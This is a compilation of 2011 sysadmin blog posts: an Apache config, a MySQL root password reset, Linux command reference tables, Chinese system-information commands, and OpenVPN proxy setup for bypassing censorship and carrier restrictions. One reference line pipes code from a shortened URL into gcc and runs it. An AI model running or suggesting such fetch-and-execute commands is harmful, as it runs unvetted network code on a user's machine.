ServerAlias [url]www.oklaoshi.org[/url] [url]www.oklaoshi.net[/url] [url]www.oklaoshi.com[/url] [url]www.oklaoshi.cn[/url]
#开启重写引擎并继承主服务器配置(映射表、条件、规则)
RewriteEngine On
RewriteOptions inherit
#传送shell中指定的加密密钥(最好只传递到特定目录下的特定文件)
#PassEnv ENCRYPT_KEY
#重新设置PHP针对每个站点的不同特性
php_admin_value open_basedir "/www/oklaoshi/"
php_admin_flag file_uploads Off
php_admin_value include_path "/www/oklaoshi/secret"
php_admin_value session.name "OKLAOSHISESSIONID"
php_admin_value session.referer_check "oklaoshi."
#默认为非本地引用
UnsetEnv Local_Referer
#判断是否为本地引用
SetEnvIf Referer "oklaoshi\.(org|net|com|cn)" Local_Referer
<Directory "/www/oklaoshi/www">
Order Allow,Deny
Allow from all
#防止盗链(必须放在<Directory>内部)
<FilesMatch "\.(js|css|gif|jpe?g|png|swf)$">
Order Allow,Deny
Allow from env=Local_Referer
</FilesMatch>
</Directory>

Recover MySQL Database root password

By: Onlyone
13 December 2011 at 22:42
Recover MySQL Database root password




By default, MySQL Server will be installed with root superuser without any password. You can connect to MySQL server as root without requiring password or by keying in blank password. However, if you have set the password for root and forget or unable to recall the password, then you will need to reset the root password for MySQL.
Login as root to the Unix-like (Unix, Linux or BSD) machine with the MySQL server.
Stop the MySQL server by using either of the following command
#/etc/init.d/mysql stop
Now you need to Start MySQL server without password
mysqld_safe --skip-grant-tables &
Connect to mysql server using mysql client with the following command
# mysql -u root
Now you should be having mysql prompt
mysql>
Now you need to Setup new MySQL root user password
mysql> use mysql;
mysql> update user set password=PASSWORD(“newrootpassword”) where user=’root’;
mysql> flush privileges;
mysql> quit
Note: Replace newrootpassword with the new root password for MySQL server. Flush Privileges is needed to making the password change effect immediately.
Now you need to Stop MySQL Server using the following command
# /etc/init.d/mysql stop
Test Your New Mysql root password
First you need to start mysql server using the following command
# /etc/init.d/mysql start
# mysql -u root -p
Now it will prompt for root password and enter your new root password

Linux Command Line Reference for Common Operations (2)

By: Onlyone
13 December 2011 at 12:54

My previous reference for practical Linux commands was surprisingly popular
with over 3.5 million hits in nearly 5 years. So I've decided to start compiling
another list of somewhat more involved/esoteric commands.
Examples marked with • are valid/safe to paste without modification into a terminal, so
you may want to keep a terminal window open while reading this so you can cut & paste.
CommandDescription
grep . /proc/sys/net/ipv4/*List the contents of flag files
set | grep $USERSearch current environment
tr '\0' '\n' < /proc/$$/environDisplay the startup environment for any process
echo $PATH | tr : '\n'Display the $PATH one per line
kill -0 $$ && echo process exists and can accept signalsCheck for the existence of a process (pid)
find /etc -readable | xargs less -K -p'*ntp' -j $((${LINES:-25}/2))Search paths and data with full context. Use n to iterate
Low impact admin
#apt-get install "package" -o Acquire::http::Dl-Limit=42 \
-o Acquire::Queue-mode=access
Rate limit apt-get to 42KB/s
 echo 'wget url' | at 01:00Download url at 1AM to current dir
#apache2ctl configtest && apache2ctl gracefulRestart apache if config is OK
nice openssl speed sha1Run a low priority command (openssl benchmark)
chrt -i 0 openssl speed sha1Run a low priority command (more effective than nice)
renice 19 -p $$; ionice -c3 -p $$Make shell (script) low priority. Use for non interactive tasks
Interactive monitoring
watch -t -n1 uptimeClock with system load
htop -d 5Better top (scrollable, tree view, lsof/strace integration, ...)
iotopWhat's doing I/O
#watch -d -n30 "nice ps_mem.py | tail -n $((${LINES:-12}-2))"What's using RAM
#iftopWhat's using the network. See also iptraf
#mtr www.pixelbeat.orgping and traceroute combined
Useful utilities
pv < /dev/zero > /dev/nullProgress Viewer for data copying from files and pipes
wkhtml2pdf http://.../linux_commands.html linux_commands.pdfMake a pdf of a web page
timeout 1 sleep 3run a command with bounded time. See also timeout
Networking
python -m SimpleHTTPServerServe current directory tree at http://$HOSTNAME:8000/
openssl s_client -connect www.google.com:443 </dev/null 2>&0 |
openssl x509 -dates -noout
Display the date range for a site's certs
curl -I www.pixelbeat.orgDisplay the server headers for a web site
#lsof -i tcp:80What's using port 80
#httpd -SDisplay a list of apache virtual hosts
vim scp://user@remote//path/to/fileEdit remote file using local vim. Good for high latency links
curl -s http://www.pixelbeat.org/pixelbeat.asc | gpg --importImport a gpg key from the web
tc qdisc add dev lo root handle 1:0 netem delay 20msecAdd 20ms latency to loopback device (for testing)
tc qdisc del dev lo rootRemove latency added above
Notification
echo "DISPLAY=$DISPLAY xmessage cooker" | at "NOW +30min"Popup reminder
notify-send "subject" "message"Display a gnome popup notification
 echo "mail -s 'go home' P@draigBrady.com < /dev/null" | at 17:30Email reminder
 uuencode file name | mail -s subject P@draigBrady.comSend a file via email
 ansi2html.sh | mail -a "Content-Type: text/html" P@draigBrady.comSend/Generate HTML email
Better default settings (useful in your .bashrc)
#tail -s.1 -f /var/log/messagesDisplay file additions more responsively
seq 100 | tail -n $((${LINES:-12}-2))Display as many lines as possible without scrolling
#tcpdump -s0Capture full network packets
Useful functions/aliases (useful in your .bashrc)
md () { mkdir -p "$1" && cd "$1"; }Change to a new directory
strerror() { python -c "import os; print os.strerror($1)"; }Display the meaning of an errno
plot() { { echo 'plot "-"' "$@"; cat; } | gnuplot -persist; }Plot stdin. (e.g: • seq 1000 | sed 's/.*/s(&)/' | bc -l | plot)
hili() { e="$1"; shift; grep --col=always -Eih "$e|$" "$@"; }highlight occurences of expr. (e.g: • env | hili $USER)
alias hd='od -Ax -tx1z -v'Hexdump. (usage e.g.: • hd /proc/self/cmdline | less)
alias realpath='readlink -f'Canonicalize path. (usage e.g.: • realpath ~/../$USER)
ord() { printf "0x%x\n" "'$1"; }shell version of the ord() function
chr() { printf $(printf '\\%03o\\n' "$1"); }shell version of the chr() function
Multimedia
DISPLAY=:0.0 import -window root orig.pngTake a (remote) screenshot
convert -filter catrom -resize '600x>' orig.png 600px_wide.pngShrink to width, computer gen images or screenshots
 mplayer -ao pcm -vo null -vc dummy /tmp/Flash*Extract audio from flash video to audiodump.wav
 ffmpeg -i filename.aviDisplay info about multimedia file
ffmpeg -f x11grab -s xga -r 25 -i :0 -sameq demo.mpgCapture video of an X display
DVD
 for i in $(seq 9); do ffmpeg -i $i.avi -target pal-dvd $i.mpg; doneConvert video to the correct encoding and aspect for DVD
 dvdauthor -odvd -t -v "pal,4:3,720xfull" *.mpg;dvdauthor -odvd -TBuild DVD file system. Use 16:9 for widescreen input
 growisofs -dvd-compat -Z /dev/dvd -dvd-video dvdBurn DVD file system to disc
Unicode
python -c "import unicodedata as u; print u.name(unichr(0x2028))"Lookup a unicode character
uconv -f utf8 -t utf8 -x nfcNormalize combining characters
printf '\300\200' | iconv -futf8 -tutf8 >/dev/nullValidate UTF-8
printf 'ŨTF8\n' | LANG=C grep --color=always '[^ -~]\+'Highlight non printable ASCII chars in UTF-8
fc-match -s "sans:lang=zh"List font match order for language and style
Development
gcc -march=native -E -v -</dev/null 2>&1|sed -n 's/.*-mar/-mar/p'Show autodetected gcc tuning params. See also gcccpuopt
for i in $(seq 4); do { [ $i = 1 ] && wget http://url.ie/6lko -qO-||
./a.out; } | tee /dev/tty | gcc -xc - 2>/dev/null; done
Compile and execute C code from stdin
cpp -dM /dev/nullShow all predefined macros
echo "#include <features.h>" | cpp -dN | grep "#define __USE_"Show all glibc feature macros
 gdb -tuiDebug showing source code context in separate windows
udev
udevadm info -a -p $(udevadm info -q path -n /dev/input/mouse0)List udev attributes of a device, for matching rules etc.
udevadm test /sys/class/input/mouse0See how udev rules are applied for a device
#udevadm control --reload-rulesReload udev rules after modification
Extended Attributes (Note you may need to (re)mount with "acl" or "user_xattr" options)
getfacl .Show ACLs for file
setfacl -m u:nobody:r .Allow a specific user to read file
setfacl -x u:nobody .Delete a specific user's rights to file
 setfacl --default -m group:users:rw- dir/Set umask for a for a specific dir
 getcap fileShow capabilities for a program
 setcap cap_net_raw+ep your_gtk_progAllow gtk program raw access to network
stat -c%C .Show SELinux context for file
 chcon ... fileSet SELinux context for file (see also restorecon)
getfattr -m- -d .Show all extended attributes (includes selinux,acls,...)
setfattr -n "user.foo" -v "bar" .Set arbitrary user attributes
BASH specific
echo 123 | tee >(tr 1 a) | tr 1 bSplit data to 2 commands (using process substitution)
 meld local_file <(ssh host cat remote_file)Compare a local and remote file (using process substitution)
Multicore
taskset -c 0 nprocRestrict a command to certain processors
find -type f -print0 | xargs -r0 -P$(nproc) -n10 md5sumProcess files in parallel over available processors
 sort -m <(sort data1) <(sort data2) >data.sortedSort separate data files over 2 processors

Linux Command Line Reference for Common Operations

By: Onlyone
13 December 2011 at 11:45

This is a linux command line reference for common operations.
Examples marked with • are valid/safe to paste without modification into a terminal, so
you may want to keep a terminal window open while reading this so you can cut & paste.
All these commands have been tested both on Fedora and Ubuntu.
See also more linux commands.
CommandDescription
apropos whatisShow commands pertinent to string. See also threadsafe
man -t ascii | ps2pdf - > ascii.pdfmake a pdf of a manual page
which commandShow full path name of command
time commandSee how long a command takes
time catStart stopwatch. Ctrl-d to stop. See also sw
dir navigation
cd -Go to previous directory
cdGo to $HOME directory
(cd dir && command)Go to dir, execute command and return to current dir
pushd .Put current dir on stack so you can popd back to it
file searching
alias l='ls -l --color=auto'quick dir listing
ls -lrtList files by date. See also newest and find_mm_yyyy
ls /usr/bin | pr -T9 -W$COLUMNSPrint in 9 columns to width of terminal
find -name '*.[ch]' | xargs grep -E 'expr'Search 'expr' in this dir and below. See also findrepo
find -type f -print0 | xargs -r0 grep -F 'example'Search all regular files for 'example' in this dir and below
find -maxdepth 1 -type f | xargs grep -F 'example'Search all regular files for 'example' in this dir
find -maxdepth 1 -type d | while read dir; do echo $dir; echo cmd2; doneProcess each item with multiple commands (in while loop)
find -type f ! -perm -444Find files not readable by all (useful for web site)
find -type d ! -perm -111Find dirs not accessible by all (useful for web site)
locate -r 'file[^/]*\.txt'Search cached index for names. This re is like glob *file*.txt
look referenceQuickly search (sorted) dictionary for prefix
grep --color reference /usr/share/dict/wordsHighlight occurances of regular expression in dictionary
archives and compression
gpg -c fileEncrypt file
gpg file.gpgDecrypt file
tar -c dir/ | bzip2 > dir.tar.bz2Make compressed archive of dir/
bzip2 -dc dir.tar.bz2 | tar -xExtract archive (use gzip instead of bzip2 for tar.gz files)
tar -c dir/ | gzip | gpg -c | ssh user@remote 'dd of=dir.tar.gz.gpg'Make encrypted archive of dir/ on remote machine
find dir/ -name '*.txt' | tar -c --files-from=- | bzip2 > dir_txt.tar.bz2Make archive of subset of dir/ and below
find dir/ -name '*.txt' | xargs cp -a --target-directory=dir_txt/ --parentsMake copy of subset of dir/ and below
(tar -c /dir/to/copy) | ( cd /where/to/ && tar -x -p )Copy (with permissions) copy/ dir to /where/to/ dir
(cd /dir/to/copy && tar -c .) | ( cd /where/to/ && tar -x -p )Copy (with permissions) contents of copy/ dir to /where/to/
(tar -c /dir/to/copy ) | ssh -C user@remote 'cd /where/to/ && tar -x -p'Copy (with permissions) copy/ dir to remote:/where/to/ dir
dd bs=1M if=/dev/sda | gzip | ssh user@remote 'dd of=sda.gz'Backup harddisk to remote machine
rsync (Network efficient file copier: Use the --dry-run option for testing)
rsync -P rsync://rsync.server.com/path/to/file fileOnly get diffs. Do multiple times for troublesome downloads
rsync --bwlimit=1000 fromfile tofileLocally copy with rate limit. It's like nice for I/O
rsync -az -e ssh --delete ~/public_html/ remote.com:'~/public_html'Mirror web site (using compression and encryption)
rsync -auz -e ssh remote:/dir/ . && rsync -auz -e ssh . remote:/dir/Synchronize current directory with remote one
ssh (Secure SHell)
ssh $USER@$HOST commandRun command on $HOST as $USER (default command=shell)
ssh -f -Y $USER@$HOSTNAME xeyesRun GUI command on $HOSTNAME as $USER
scp -p -r $USER@$HOST: file dir/Copy with permissions to $USER's home directory on $HOST
scp -c arcfour $USER@$LANHOST: bigfileUse faster crypto for local LAN. This might saturate GigE
ssh -g -L 8080:localhost:80 root@$HOSTForward connections to $HOSTNAME:8080 out to $HOST:80
ssh -R 1434:imap:143 root@$HOSTForward connections from $HOST:1434 in to imap:143
ssh-copy-id $USER@$HOSTInstall public key for $USER@$HOST for password-less log in
wget (multi purpose download tool)
(cd dir/ && wget -nd -pHEKk http://www.pixelbeat.org/cmdline.html)Store local browsable version of a page to the current dir
wget -c http://www.example.com/large.fileContinue downloading a partially downloaded file
wget -r -nd -np -l1 -A '*.jpg' http://www.example.com/dir/Download a set of files to the current directory
wget ftp://remote/file[1-9].iso/FTP supports globbing directly
wget -q -O- http://www.pixelbeat.org/timeline.html | grep 'a href' | headProcess output directly
echo 'wget url' | at 01:00Download url at 1AM to current dir
wget --limit-rate=20k urlDo a low priority download (limit to 20KB/s in this case)
wget -nv --spider --force-html -i bookmarks.htmlCheck links in a file
wget --mirror http://www.example.com/Efficiently update a local copy of a site (handy from cron)
networking (Note ifconfig, route, mii-tool, nslookup commands are obsolete)
ethtool eth0Show status of ethernet interface eth0
ethtool --change eth0 autoneg off speed 100 duplex fullManually set ethernet interface speed
iwconfig eth1Show status of wireless interface eth1
iwconfig eth1 rate 1Mb/s fixedManually set wireless interface speed
iwlist scanList wireless networks in range
ip link showList network interfaces
ip link set dev eth0 name wanRename interface eth0 to wan
ip link set dev eth0 upBring interface eth0 up (or down)
ip addr showList addresses for interfaces
ip addr add 1.2.3.4/24 brd + dev eth0Add (or del) ip and mask (255.255.255.0)
ip route showList routing table
ip route add default via 1.2.3.254Set default gateway to 1.2.3.254
host pixelbeat.orgookup DNS ip address for name or vice versaL
hostname -iLookup local ip address (equivalent to host `hostname`)
whois pixelbeat.orgLookup whois info for hostname or ip address
netstat -tuplList internet services on a system
netstat -tupList active connections to/from system
windows networking (Note samba is the package that provides all this windows specific networking support)
smbtreeFind windows machines. See also findsmb
nmblookup -A 1.2.3.4Find the windows (netbios) name associated with ip address
smbclient -L windows_boxList shares on windows machine or samba server
mount -t smbfs -o fmask=666,guest //windows_box/share /mnt/shareMount a windows share
echo 'message' | smbclient -M windows_boxSend popup to windows machine (off by default in XP sp2)
text manipulation (Note sed uses stdin and stdout. Newer versions support inplace editing with the -i option)
sed 's/string1/string2/g'Replace string1 with string2
sed 's/\(.*\)1/\12/g'Modify anystring1 to anystring2
sed '/ *#/d; /^ *$/d'Remove comments and blank lines
sed ':a; /\\$/N; s/\\\n//; ta'Concatenate lines with trailing \
sed 's/[ \t]*$//'Remove trailing spaces from lines
sed 's/\([`"$\]\)/\\\1/g'Escape shell metacharacters active within double quotes
seq 10 | sed "s/^/      /; s/ *\(.\{7,\}\)/\1/"Right align numbers
sed -n '1000{p;q}'Print 1000th line
sed -n '10,20p;20q'Print lines 10 to 20
sed -n 's/.*<title>\(.*\)<\/title>.*/\1/ip;T;q'Extract title from HTML web page
sed -i 42d ~/.ssh/known_hostsDelete a particular line
sort -t. -k1,1n -k2,2n -k3,3n -k4,4nSort IPV4 ip addresses
echo 'Test' | tr '[:lower:]' '[:upper:]'Case conversion
tr -dc '[:print:]' < /dev/urandomFilter non printable characters
tr -s '[:blank:]' '\t' </proc/diskstats | cut -f4cut fields separated by blanks
history | wc -lCount lines
set operations (Note you can export LANG=C for speed. Also these assume no duplicate lines within a file)
sort file1 file2 | uniqUnion of unsorted files
sort file1 file2 | uniq -dIntersection of unsorted files
sort file1 file1 file2 | uniq -uDifference of unsorted files
sort file1 file2 | uniq -uSymmetric Difference of unsorted files
join -t'\0' -a1 -a2 file1 file2Union of sorted files
join -t'\0' file1 file2Intersection of sorted files
join -t'\0' -v2 file1 file2Difference of sorted files
join -t'\0' -v1 -v2 file1 file2Symmetric Difference of sorted files
math
echo '(1 + sqrt(5))/2' | bc -lQuick math (Calculate φ). See also bc
seq -f '4/%g' 1 2 99999 | paste -sd-+ | bc -lCalculate π the unix way
echo 'pad=20; min=64; (100*10^6)/((pad+min)*8)' | bcMore complex (int) e.g. This shows max FastE packet rate
echo 'pad=20; min=64; print (100E6)/((pad+min)*8)' | pythonPython handles scientific notation
echo 'pad=20; plot [64:1518] (100*10**6)/((pad+x)*8)' | gnuplot -persistPlot FastE packet rate vs packet size
echo 'obase=16; ibase=10; 64206' | bcBase conversion (decimal to hexadecimal)
echo $((0x2dec))Base conversion (hex to dec) ((shell arithmetic expansion))
units -t '100m/9.58s' 'miles/hour'Unit conversion (metric to imperial)
units -t '500GB' 'GiB'Unit conversion (SI to IEC prefixes)
units -t '1 googol'Definition lookup
seq 100 | (tr '\n' +; echo 0) | bcAdd a column of numbers. See also add and funcpy
calendar
cal -3Display a calendar
cal 9 1752Display a calendar for a particular month year
date -d friWhat date is it this friday. See also day
[ $(date -d '12:00 +1 day' +%d) = '01' ] || exitexit a script unless it's the last day of the month
date --date='25 Dec' +%AWhat day does xmas fall on, this year
date --date='@2147483647'Convert seconds since the epoch (1970-01-01 UTC) to date
TZ='America/Los_Angeles' dateWhat time is it on west coast of US (use tzselect to find TZ)
date --date='TZ="America/Los_Angeles" 09:00 next Fri'What's the local time for 9AM next Friday on west coast US
locales
printf "%'d\n" 1234Print number with thousands grouping appropriate to locale
BLOCK_SIZE=\'1 ls -lUse locale thousands grouping in ls. See also l
echo "I live in `locale territory`"Extract info from locale database
LANG=en_IE.utf8 locale int_prefixLookup locale info for specific country. See also ccodes
locale -kc $(locale | sed -n 's/\(LC_.\{4,\}\)=.*/\1/p') | lessList fields available in locale database
recode (Obsoletes iconv, dos2unix, unix2dos)
recode -l | lessShow available conversions (aliases on each line)
recode windows-1252.. file_to_change.txtWindows "ansi" to local charset (auto does CRLF conversion)
recode utf-8/CRLF.. file_to_change.txtWindows utf8 to local charset
recode iso-8859-15..utf8 file_to_change.txtLatin9 (western europe) to utf8
recode ../b64 < file.txt > file.b64Base64 encode
recode /qp.. < file.qp > file.txtQuoted printable decode
recode ..HTML < file.txt > file.htmlText to HTML
recode -lf windows-1252 | grep euroLookup table of characters
echo -n 0x80 | recode latin-9/x1..dumpShow what a code represents in latin-9 charmap
echo -n 0x20AC | recode ucs-2/x2..latin-9/xShow latin-9 encoding
echo -n 0x20AC | recode ucs-2/x2..utf-8/xShow utf-8 encoding
CDs
gzip < /dev/cdrom > cdrom.iso.gzSave copy of data cdrom
mkisofs -V LABEL -r dir | gzip > cdrom.iso.gzCreate cdrom image from contents of dir
mount -o loop cdrom.iso /mnt/dirMount the cdrom image at /mnt/dir (read only)
cdrecord -v dev=/dev/cdrom blank=fastClear a CDRW
gzip -dc cdrom.iso.gz | cdrecord -v dev=/dev/cdrom -Burn cdrom image (use dev=ATAPI -scanbus to confirm dev)
cdparanoia -BRip audio tracks from CD to wav files in current dir
cdrecord -v dev=/dev/cdrom -audio -pad *.wavMake audio CD from all wavs in current dir (see also cdrdao)
oggenc --tracknum='track' track.cdda.wav -o 'track.ogg'Make ogg file from wav file
disk space (See also FSlint)
ls -lSrShow files by size, biggest last
du -s * | sort -k1,1rn | headShow top disk users in current dir. See also dutop
du -hs /home/* | sort -k1,1hSort paths by easy to interpret disk usage
df -hShow free space on mounted filesystems
df -iShow free inodes on mounted filesystems
fdisk -lShow disks partitions sizes and types (run as root)
rpm -q -a --qf '%10{SIZE}\t%{NAME}\n' | sort -k1,1nList all packages by installed size (Bytes) on rpm distros
dpkg-query -W -f='${Installed-Size;10}\t${Package}\n' | sort -k1,1nList all packages by installed size (KBytes) on deb distros
dd bs=1 seek=2TB if=/dev/null of=ext3.testCreate a large test file (taking no space). See also truncate
> filetruncate data of file or create an empty file
monitoring/debugging
tail -f /var/log/messagesMonitor messages in a log file
strace -c ls >/dev/nullSummarise/profile system calls made by command
strace -f -e open ls >/dev/nullList system calls made by command
strace -f -e trace=write -e write=1,2 ls >/dev/nullMonitor what's written to stdout and stderr
ltrace -f -e getenv ls >/dev/nullList library calls made by command
lsof -p $$List paths that process id has open
lsof ~List processes that have specified path open
tcpdump not port 22Show network traffic except ssh. See also tcpdump_not_me
ps -e -o pid,args --forestList processes in a hierarchy
ps -e -o pcpu,cpu,nice,state,cputime,args --sort pcpu | sed '/^ 0.0 /d'List processes by % cpu usage
ps -e -orss=,args= | sort -b -k1,1n | pr -TW$COLUMNSList processes by mem (KB) usage. See also ps_mem.py
ps -C firefox-bin -L -o pid,tid,pcpu,stateList all threads for a particular process
ps -p 1,$$ -o etime=List elapsed wall time for particular process IDs
last rebootShow system reboot history
free -mShow amount of (remaining) RAM (-m displays in MB)
watch -n.1 'cat /proc/interrupts'Watch changeable data continuously
udevadm monitorMonitor udev events to help configure rules
system information (see also sysinfo) ('#' means root access is required)
uname -aShow kernel version and system architecture
head -n1 /etc/issueShow name and version of distribution
cat /proc/partitionsShow all partitions registered on the system
grep MemTotal /proc/meminfoShow RAM total seen by the system
grep "model name" /proc/cpuinfoShow CPU(s) info
lspci -tvShow PCI info
lsusb -tvShow USB info
mount | column -tList mounted filesystems on the system (and align output)
grep -F capacity: /proc/acpi/battery/BAT0/infoShow state of cells in laptop battery
#dmidecode -q | lessDisplay SMBIOS/DMI information
#smartctl -A /dev/sda | grep Power_On_HoursHow long has this disk (system) been powered on in total
#hdparm -i /dev/sdaShow info about disk sda
#hdparm -tT /dev/sdaDo a read speed test on disk sda
#badblocks -s /dev/sdaTest for unreadable blocks on disk sda
interactive (see also linux keyboard shortcuts)
readlineLine editor used by bash, python, bc, gnuplot, ...
screenVirtual terminals with detach capability, ...
mcPowerful file manager that can browse rpm, tar, ftp, ssh, ...
gnuplotInteractive/scriptable graphing
linksWeb browser
xdg-open .open a file or url with the registered desktop application
© Jan 7 2008   [Comments] | [Add link to ...] |

Linux系统信息查看命令大全

By: Onlyone
13 December 2011 at 11:41

最近看了一些Linux命令行的文章,在系统信息查看方面学到不少命令。发现这些系统信息查看命令也可以总结出一篇小小的东西来了。

另外这里还有非常多的命令, 可以作为参考。


系统
# uname -a               # 查看内核/操作系统/CPU信息
# head -n 1 /etc/issue   # 查看操作系统版本
# cat /proc/cpuinfo      # 查看CPU信息
# hostname               # 查看计算机名
# lspci -tv              # 列出所有PCI设备
# lsusb -tv              # 列出所有USB设备
# lsmod                  # 列出加载的内核模块
# env                    # 查看环境变量
资源
# free -m                # 查看内存使用量和交换区使用量
# df -h                  # 查看各分区使用情况
# du -sh <目录名>        # 查看指定目录的大小
# grep MemTotal /proc/meminfo   # 查看内存总量
# grep MemFree /proc/meminfo    # 查看空闲内存量
# uptime                 # 查看系统运行时间、用户数、负载
# cat /proc/loadavg      # 查看系统负载
磁盘和分区
# mount | column -t      # 查看挂接的分区状态
# fdisk -l               # 查看所有分区
# swapon -s              # 查看所有交换分区
# hdparm -i /dev/hda     # 查看磁盘参数(仅适用于IDE设备)
# dmesg | grep IDE       # 查看启动时IDE设备检测状况
网络
# ifconfig               # 查看所有网络接口的属性
# iptables -L            # 查看防火墙设置
# route -n               # 查看路由表
# netstat -lntp          # 查看所有监听端口
# netstat -antp          # 查看所有已经建立的连接
# netstat -s             # 查看网络统计信息
进程
# ps -ef                 # 查看所有进程
# top                    # 实时显示进程状态
用户
# w                      # 查看活动用户
# id <用户名>            # 查看指定用户信息
# last                   # 查看用户登录日志
# cut -d: -f1 /etc/passwd   # 查看系统所有用户
# cut -d: -f1 /etc/group    # 查看系统所有组
# crontab -l             # 查看当前用户的计划任务
服务
# chkconfig --list       # 列出所有系统服务
# chkconfig --list | grep on    # 列出所有启动的系统服务
程序
# rpm -qa                # 查看所有安装的软件包

附加一张总结的很好Linux常用命定的图片:
Linux 文件结构大全

OpenVPN使用前置代理

By: Onlyone
9 December 2011 at 08:28

使用tcp 80或443端口的OpenVPN相比pptp/l2tp/ipsec有个优势就是可以使用前置代理。

这点有以下几个作用:

一、必须使用代理连外网时,有些公司的网络需要使用固定的代理服务器才能连接外网,这种情况下此类openvpn就可以一试了(还可以用于cmwap网络破解)。

二、openvpn服务器被墙时,有时候你好不容易找到一个好用的openvpn结果没GFW封锁了服务器IP,这种情况下此类openvpn就可以配合国外普通代理服务器来达到翻墙的目的。

三、用于VPN提速时,也是好不容易找来个openvpn(比如这个),结果欧洲的服务器ping值很高导致速度较慢,这种情况下此类openvpn就可以配合美国普通代理服务器来达到中转提速的目的。

代理设置方法如下:

代理无需认证时,写字板打开.ovpn格式的openvpn配置文件,在配置末尾添加如下内容即可:

http-proxy-retry
http-proxy 210.150.23.87 8080
mute-replay-warnings

其中,210.150.23.87为你的代理服务器地址,8080为其端口,中间隔一个空格(如果是cmwap突破还要加上 http-proxy-option AGENT "NokiaN90″ 伪装以防移动)。

代理需要认证时,写字板打开.ovpn格式的openvpn配置文件,在配置末尾添加如下内容即可实现记住代理密码:

http-proxy-retry
http-proxy 208.100.56.10 8080 pass.txt basic
mute-replay-warnings

其中,208.100.56.10为你的代理服务器地址,8080为其端口,pass.txt为你创建的含有代理用户名和密码的文件名 字,basic为代理认证类型,中间隔一个空格(pass.txt为一个文本文件,第一行为代理用户名,第二行为代理密码,要和.ovpn格式的 openvpn配置文件在同一文件夹下;常用代理认证类型还有ntlm)

其实在OpenVPN GUI 上就有代理设置,不过设置在配置文件里不影响其他OpenVPN,还有比较方便的代理认证。

另外openvpn配置文件里加入以下设置,可以情况本机DNS缓存,保障清洁的本机DNS环境:

script-security 3 system
route-up "net stop dnscache"
route-up "net start dnscache"
route-up "ipconfig /flushdns"
route-up "ipconfig /registerdns"

本文原始地址http://igfw.tk/archives/6732

❌
❌